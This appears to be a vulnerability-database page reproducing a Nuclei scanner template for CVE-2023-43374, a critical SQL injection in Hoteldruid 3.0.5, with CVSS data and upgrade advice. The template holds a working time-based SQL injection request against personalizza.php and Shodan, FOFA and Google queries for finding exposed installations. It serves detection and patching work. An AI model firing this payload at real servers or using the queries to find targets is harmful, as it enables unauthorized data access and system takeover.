Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-43374HistoryMay 09, 2024 - 11:33 a.m.
Hoteldruid v3.0.5 - SQL Injection
2024-05-0911:33:01
ProjectDiscovery
github.com
14
hoteldruid
sqlinjection
vulnerability
sensitive data
system takeover
upgrade
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.01
Percentile
83.6%
Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.
id: CVE-2023-43374
info:
name: Hoteldruid v3.0.5 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data or complete takeover of the affected system.
remediation: |
Upgrade Hoteldruid to a patched version that addresses the SQL Injection vulnerability.
reference:
- https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-id_utente_log-parameter-8b89f014004947e7bd2ecdacf1610cf9
- https://nvd.nist.gov/vuln/detail/CVE-2023-43374
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43374
cwe-id: CWE-89
epss-score: 0.00735
epss-percentile: 0.80777
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: digitaldruid
product: hoteldruid
shodan-query:
- title:"HotelDruid"
- http.title:"hoteldruid"
- http.favicon.hash:-1521640213
fofa-query:
- title="HotelDruid"
- title="hoteldruid"
- icon_hash=-1521640213
google-query: intitle:"hoteldruid"
tags: cve,cve2023,hoteldruid,cms,sqli,digitaldruid
flow: http(1) && http(2)
http:
- raw:
- |
GET /hoteldruid/inizio.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "HotelDruid</a>"
internal: true
- raw:
- |
@timeout: 20s
POST /hoteldruid/personalizza.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(body, "HotelDruid:")'
condition: and
# digest: 4a0a00473045022100ed2d51a5b859e168d3fc27ac78f51230ab105242084cf9831ea4b902476c839102206db1002120c87c478ebee22051057ab49b28ac5e09ce3df92c36d34fff1e7e6c:922c64590222798bb761d5b6d8e72950Related
debiancve
debiancve
CVE-2023-43374
2023-09-20 19:15:12
nvd
nvd
CVE-2023-43374
2023-09-20 19:15:12
vulnrichment
vulnrichment
CVE-2023-43374
2023-09-20 00:00:00
cve
cve
CVE-2023-43374
2023-09-20 19:15:12
ubuntucve
ubuntucve
CVE-2023-43374
2023-09-20 00:00:00
prion
prion
Sql injection
2023-09-20 19:15:00
veracode
veracode
SQL Injection
2023-11-28 00:17:27
cvelist
cvelist
CVE-2023-43374
2023-09-20 00:00:00
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.01
Percentile
83.6%
Related for NUCLEI:CVE-2023-43374